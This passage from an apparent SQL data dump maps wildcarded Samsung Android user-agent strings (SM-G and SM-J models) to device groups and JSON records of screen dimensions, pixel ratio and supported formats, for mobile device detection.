Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900MD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900R7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900T3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G901F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G903F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G903M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G903W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G906K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G906L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G920W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G925W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G928A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G928C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G928F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G928G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G928T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G928V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G930P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G930T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G930U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G930V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G930W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G9350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G935P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G935S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G935T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G935V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J106B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J106F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J106H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J106M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J120W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J210F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J260M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J320N0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J320R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J320V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J320VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J320W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J327F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J327P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J500FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J500G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J5108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 